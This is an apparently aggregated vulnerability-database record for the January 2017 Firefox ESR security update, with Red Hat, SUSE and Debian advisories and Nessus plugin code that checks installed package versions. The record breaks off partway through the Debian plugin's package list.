ID RHSA-2017:0190 Type redhat Reporter RedHat Modified 2018-06-06T20:24:12
Description
Mozilla Firefox is an open source web browser.
This update upgrades Firefox to version 45.7.0 ESR.
Security Fix(es):
Multiple flaws were found in the processing of malformed web content. A web
page containing malicious content could cause Firefox to crash or, potentially,
execute arbitrary code with the privileges of the user running Firefox.
(CVE-2017-5373, CVE-2017-5375, CVE-2017-5376, CVE-2017-5378, CVE-2017-5380,
CVE-2017-5383, CVE-2017-5386, CVE-2017-5390, CVE-2017-5396)
Red Hat would like to thank the Mozilla project for reporting these issues.
Upstream acknowledges Jann Horn, Filipe Gomes, Muneaki Nishimura, Nils, Armin
Razmjou, Christian Holler, Gary Kwong, Andre Bargull, Jan de Mooij, Tom
Schuster, Oriol, Rh0, Nicolas Gregoire, and Jerri Rice as the original
reporters.
{"suse": [{"lastseen": "2017-02-08T18:59:55", "bulletinFamily": "unix", "description": "MozillaFirefox 45 ESR was updated to 45.7 to fix the following issues\n (bsc#1021991):\n\n * MFSA 2017-02/CVE-2017-5378: Pointer and frame data leakage of Javascript\n objects (bsc#1021818)\n * MFSA 2017-02/CVE-2017-5396: Use-after-free with Media Decoder\n (bsc#1021821)\n * MFSA 2017-02/CVE-2017-5386: WebExtensions can use data: protocol to\n affect other extensions (bsc#1021823)\n * MFSA 2017-02/CVE-2017-5380: Potential use-after-free during DOM\n manipulations (bsc#1021819)\n * MFSA 2017-02/CVE-2017-5390: Insecure communication methods in Developer\n Tools JSON viewer (bsc#1021820)\n * MFSA 2017-02/CVE-2017-5373: Memory safety bugs fixed in Firefox 51 and\n Firefox ESR 45.7 (bsc#1021824)\n * MFSA 2017-02/CVE-2017-5375: Excessive JIT code allocation allows bypass\n of ASLR and DEP (bsc#1021814)\n * MFSA 2017-02/CVE-2017-5376: Use-after-free in XSL (bsc#1021817)\n * MFSA 2017-02/CVE-2017-5383: Location bar spoofing with unicode\n characters (bsc#1021822)\n\n Please see <a rel=\"nofollow\" href=\"https://www.mozilla.org/en-US/security/advisories/mfsa2017-02/\">https://www.mozilla.org/en-US/security/advisories/mfsa2017-02/</a>\n for more information.\n\n", "modified": "2017-02-08T18:10:27", "published": "2017-02-08T18:10:27", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-02/msg00016.html", "id": "SUSE-SU-2017:0426-1", "type": "suse", "title": "Security update for MozillaFirefox (important)", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-02-09T02:59:56", "bulletinFamily": "unix", "description": "MozillaFirefox 45 ESR was updated to 45.7 to fix the following issues\n (bsc#1021991):\n\n * MFSA 2017-02/CVE-2017-5378: Pointer and frame data leakage of Javascript\n objects (bsc#1021818)\n * MFSA 2017-02/CVE-2017-5396: Use-after-free with Media Decoder\n (bsc#1021821)\n * MFSA 2017-02/CVE-2017-5386: WebExtensions can use data: protocol to\n affect other extensions (bsc#1021823)\n * MFSA 2017-02/CVE-2017-5380: Potential use-after-free during DOM\n manipulations (bsc#1021819)\n * MFSA 2017-02/CVE-2017-5390: Insecure communication methods in Developer\n Tools JSON viewer (bsc#1021820)\n * MFSA 2017-02/CVE-2017-5373: Memory safety bugs fixed in Firefox 51 and\n Firefox ESR 45.7 (bsc#1021824)\n * MFSA 2017-02/CVE-2017-5375: Excessive JIT code allocation allows bypass\n of ASLR and DEP (bsc#1021814)\n * MFSA 2017-02/CVE-2017-5376: Use-after-free in XSL (bsc#1021817)\n * MFSA 2017-02/CVE-2017-5383: Location bar spoofing with unicode\n characters (bsc#1021822)\n\n Please see <a rel=\"nofollow\" href=\"https://www.mozilla.org/en-US/security/advisories/mfsa2017-02/\">https://www.mozilla.org/en-US/security/advisories/mfsa2017-02/</a>\n for more information.\n\n", "modified": "2017-02-09T03:07:40", "published": "2017-02-09T03:07:40", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-02/msg00017.html", "id": "SUSE-SU-2017:0427-1", "title": "Security update for MozillaFirefox (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-02-02T00:59:49", "bulletinFamily": "unix", "description": "This update for MozillaFirefox to version 51.0.1 fixes security issues and\n bugs.\n\n These security issues were fixed:\n\n * CVE-2017-5375: Excessive JIT code allocation allows bypass of ASLR and\n DEP (bmo#1325200, boo#1021814)\n * CVE-2017-5376: Use-after-free in XSL (bmo#1311687, boo#1021817)\n CVE-2017-5377: Memory corruption with transforms to create gradients in\n Skia (bmo#1306883, boo#1021826)\n * CVE-2017-5378: Pointer and frame data leakage of Javascript objects\n (bmo#1312001, bmo#1330769, boo#1021818)\n * CVE-2017-5379: Use-after-free in Web Animations (bmo#1309198,boo#1021827)\n * CVE-2017-5380: Potential use-after-free during DOM manipulations\n (bmo#1322107, boo#1021819)\n * CVE-2017-5390: Insecure communication methods in Developer Tools JSON\n viewer (bmo#1297361, boo#1021820)\n * CVE-2017-5389: WebExtensions can install additional add-ons via modified\n host requests (bmo#1308688, boo#1021828)\n * CVE-2017-5396: Use-after-free with Media Decoder (bmo#1329403,\n boo#1021821)\n * CVE-2017-5381: Certificate Viewer exporting can be used to navigate and\n save to arbitrary filesystem locations (bmo#1017616, boo#1021830)\n * CVE-2017-5382: Feed preview can expose privileged content errors and\n exceptions (bmo#1295322, boo#1021831)\n * CVE-2017-5383: Location bar spoofing with unicode characters\n (bmo#1323338, bmo#1324716, boo#1021822)\n * CVE-2017-5384: Information disclosure via Proxy Auto-Config (PAC)\n (bmo#1255474, boo#1021832)\n * CVE-2017-5385: Data sent in multipart channels ignores referrer-policy\n response headers (bmo#1295945, boo#1021833)\n * CVE-2017-5386: WebExtensions can use data: protocol to affect other\n extensions (bmo#1319070, boo#1021823)\n * CVE-2017-5391: Content about: pages can load privileged about: pages\n (bmo#1309310, boo#1021835)\n * CVE-2017-5393: Remove addons.mozilla.org CDN from whitelist for\n mozAddonManager (bmo#1309282, boo#1021837)\n * CVE-2017-5387: Disclosure of local file existence through TRACK tag\n error messages (bmo#1295023, boo#1021839)\n * CVE-2017-5388: WebRTC can be used to generate a large amount of UDP\n traffic for DDOS attacks (bmo#1281482, boo#1021840)\n * CVE-2017-5374: Memory safety bugs (boo#1021841)\n * CVE-2017-5373: Memory safety bugs (boo#1021824)\n\n These non-security issues in MozillaFirefox were fixed:\n\n * Added support for FLAC (Free Lossless Audio Codec) playback\n * Added support for WebGL 2\n * Added Georgian (ka) and Kabyle (kab) locales\n * Support saving passwords for forms without 'submit' events\n * Improved video performance for users without GPU acceleration\n * Zoom indicator is shown in the URL bar if the zoom level is not at\n default level\n * View passwords from the prompt before saving them\n * Remove Belarusian (be) locale\n * Use Skia for content rendering (Linux)\n * Improve recognition of LANGUAGE env variable (boo#1017174)\n * Multiprocess incompatibility did not correctly register with some\n add-ons (bmo#1333423)\n\n", "modified": "2017-02-02T00:13:07", "published": "2017-02-02T00:13:07", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-02/msg00002.html", "id": "OPENSUSE-SU-2017:0358-1", "type": "suse", "title": "Security update for MozillaFirefox (important)", "cvss": {"score": 0.0, "vector": "NONE"}}], "debian": [{"lastseen": "2019-05-30T02:21:43", "bulletinFamily": "unix", "description": "Package : firefox-esr\nVersion : 45.7.0esr-1~deb7u1\nCVE ID : CVE-2017-5373 CVE-2017-5375 CVE-2017-5376 CVE-2017-5378\n CVE-2017-5380 CVE-2017-5383 CVE-2017-5386 CVE-2017-5390\n CVE-2017-5396\n\nMultiple security issues have been found in the Mozilla Firefox web\nbrowser: Multiple memory safety errors, use-after-frees and other\nimplementation errors may lead to the execution of arbitrary code or\ninformation leaks or privilege escalation.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n45.7.0esr-1~deb7u1.\n\nWe recommend that you upgrade your firefox-esr packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "modified": "2017-01-26T17:18:25", "published": "2017-01-26T17:18:25", "id": "DEBIAN:DLA-800-1:36A02", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201701/msg00035.html", "title": "[SECURITY] [DLA 800-1] firefox-esr security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:21:57", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3771-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nJanuary 25, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : firefox-esr\nCVE ID : CVE-2017-5373 CVE-2017-5375 CVE-2017-5376 CVE-2017-5378 \n CVE-2017-5380 CVE-2017-5383 CVE-2017-5386 CVE-2017-5390 \n CVE-2017-5396\n\nMultiple security issues have been found in the Mozilla Firefox web\nbrowser: Memory safety errors, use-after-frees and other implementation\nerrors may lead to the execution of arbitrary code, information\ndisclosure or privilege escalation.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 45.7.0esr-1~deb8u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 45.7.0esr-1 of firefox-esr and version 51.0-1 of firefox.\n\nWe recommend that you upgrade your firefox-esr packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2017-01-25T21:47:05", "published": "2017-01-25T21:47:05", "id": "DEBIAN:DSA-3771-1:9FE2D", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00022.html", "title": "[SECURITY] [DSA 3771-1] firefox-esr security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:22:51", "bulletinFamily": "unix", "description": "Package : icedove\nVersion : 1:45.8.0-3~deb7u1\nCVE ID : CVE-2017-5373 CVE-2017-5375 CVE-2017-5376 CVE-2017-5378 \n CVE-2017-5380 CVE-2017-5383 CVE-2017-5390 CVE-2017-5396 \n CVE-2017-5398 CVE-2017-5400 CVE-2017-5401 CVE-2017-5402 \n CVE-2017-5404 CVE-2017-5405 CVE-2017-5407 CVE-2017-5408 \n CVE-2017-5410\n\nMultiple security issues have been found in the Mozilla Thunderbird mail\nclient: Multiple memory safety errors, buffer overflows and other\nimplementation errors may lead to the execution of arbitrary code or spoofing.\n\nWith version 45.8 Debian drops it's custom branding from the Icedove package\nand ships the mail client as Thunderbird again. Please see the link below for\nfurther information:\n https://wiki.debian.org/Thunderbird\n\nTransition packages for the Icedove packages are provided which\nautomatically upgrade to the new version. Since new binary packages need\nto be installed, make sure to allow that in your upgrade procedure (e.g.\nby using "apt-get dist-upgrade" instead of "apt-get upgrade").\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n1:45.8.0-3~deb7u1.\n\nWe recommend that you upgrade your icedove packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "modified": "2017-04-19T05:29:40", "published": "2017-04-19T05:29:40", "id": "DEBIAN:DLA-896-1:AEB5D", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201704/msg00021.html", "title": "[SECURITY] [DLA 896-1] icedove/thunderbird security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:21:50", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3832-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nApril 20, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : icedove\nCVE ID : CVE-2017-5373 CVE-2017-5375 CVE-2017-5376 CVE-2017-5378 \n CVE-2017-5380 CVE-2017-5383 CVE-2017-5390 CVE-2017-5396 \n CVE-2017-5398 CVE-2017-5400 CVE-2017-5401 CVE-2017-5402 \n CVE-2017-5404 CVE-2017-5405 CVE-2017-5407 CVE-2017-5408 \n CVE-2017-5410\n\nMultiple security issues have been found in Thunderbird, which may may\nlead to the execution of arbitrary code or information leaks.\n\nWith this update, the Icedove packages are de-branded back to the official\nMozilla branding. With the removing of the Debian branding the packages\nare also renamed back to the official names used by Mozilla.\n\nThe Thunderbird package is using a different default profile folder,\nthe default profile folder is now '$(HOME)/.thunderbird'.\nThe users profile folder, that was used in Icedove, will get migrated\nto the new profile folder on the first start, that can take a little bit\nmore time.\n\nPlease read README.Debian for getting more information about the\nchanges.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1:45.8.0-3~deb8u1.\n\nWe recommend that you upgrade your icedove packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2017-04-20T21:05:20", "published": "2017-04-20T21:05:20", "id": "DEBIAN:DSA-3832-1:2645B", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00091.html", "title": "[SECURITY] [DSA 3832-1] icedove security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2019-02-21T01:29:13", "bulletinFamily": "scanner", "description": "This update upgrades Firefox to version 45.7.0 ESR.\n\nSecurity Fix(es) :\n\n - Multiple flaws were found in the processing of malformed web content. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2017-5373, CVE-2017-5375, CVE-2017-5376, CVE-2017-5378, CVE-2017-5380, CVE-2017-5383, CVE-2017-5386, CVE-2017-5390, CVE-2017-5396)", "modified": "2018-12-27T00:00:00", "id": "SL_20170125_FIREFOX_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=96792", "published": "2017-01-26T00:00:00", "title": "Scientific Linux Security Update : firefox on SL5.x, SL6.x, SL7.x i386/x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96792);\n script_version(\"3.6\");\n script_cvs_date(\"Date: 2018/12/27 10:05:37\");\n\n script_cve_id(\"CVE-2017-5373\", \"CVE-2017-5375\", \"CVE-2017-5376\", \"CVE-2017-5378\", \"CVE-2017-5380\", \"CVE-2017-5383\", \"CVE-2017-5386\", \"CVE-2017-5390\", \"CVE-2017-5396\");\n\n script_name(english:\"Scientific Linux Security Update : firefox on SL5.x, SL6.x, SL7.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update upgrades Firefox to version 45.7.0 ESR.\n\nSecurity Fix(es) :\n\n - Multiple flaws were found in the processing of malformed\n web content. A web page containing malicious content\n could cause Firefox to crash or, potentially, execute\n arbitrary code with the privileges of the user running\n Firefox. (CVE-2017-5373, CVE-2017-5375, CVE-2017-5376,\n CVE-2017-5378, CVE-2017-5380, CVE-2017-5383,\n CVE-2017-5386, CVE-2017-5390, CVE-2017-5396)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1701&L=scientific-linux-errata&F=&S=&P=12036\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8b66bf74\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected firefox and / or firefox-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"firefox-45.7.0-1.el5_11\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"firefox-debuginfo-45.7.0-1.el5_11\")) flag++;\n\nif (rpm_check(release:\"SL6\", reference:\"firefox-45.7.0-1.el6_8\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"firefox-debuginfo-45.7.0-1.el6_8\")) flag++;\n\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"firefox-45.7.0-1.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"firefox-debuginfo-45.7.0-1.el7_3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:29:13", "bulletinFamily": "scanner", "description": "Multiple security issues have been found in the Mozilla Firefox web browser: Memory safety errors, use-after-frees and other implementation errors may lead to the execution of arbitrary code, information disclosure or privilege escalation.", "modified": "2018-11-10T00:00:00", "id": "DEBIAN_DSA-3771.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=96780", "published": "2017-01-26T00:00:00", "title": "Debian DSA-3771-1 : firefox-esr - security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3771. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96780);\n script_version(\"3.9\");\n script_cvs_date(\"Date: 2018/11/10 11:49:38\");\n\n script_cve_id(\"CVE-2017-5373\", \"CVE-2017-5375\", \"CVE-2017-5376\", \"CVE-2017-5378\", \"CVE-2017-5380\", \"CVE-2017-5383\", \"CVE-2017-5386\", \"CVE-2017-5390\", \"CVE-2017-5396\");\n script_xref(name:\"DSA\", value:\"3771\");\n\n script_name(english:\"Debian DSA-3771-1 : firefox-esr - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple security issues have been found in the Mozilla Firefox web\nbrowser: Memory safety errors, use-after-frees and other\nimplementation errors may lead to the execution of arbitrary code,\ninformation disclosure or privilege escalation.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/firefox-esr\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2017/dsa-3771\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the firefox-esr packages.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 45.7.0esr-1~deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:firefox-esr\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-dbg\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-dev\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-ach\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-af\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-all\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-an\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-ar\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-as\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-ast\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-az\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-be\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-bg\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-bn-bd\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-bn-in\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-br\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-bs\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-ca\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-cs\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-cy\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-da\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-de\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-dsb\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-el\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-en-gb\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-en-za\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-eo\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-es-ar\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-es-cl\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-es-es\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-es-mx\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-et\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-eu\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-fa\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-ff\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-fi\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-fr\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-fy-nl\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-ga-ie\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-gd\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-gl\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-gn\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-gu-in\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-he\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-hi-in\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-hr\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-hsb\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-hu\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-hy-am\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-id\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-is\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-it\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-ja\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-kk\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-km\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-kn\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-ko\", 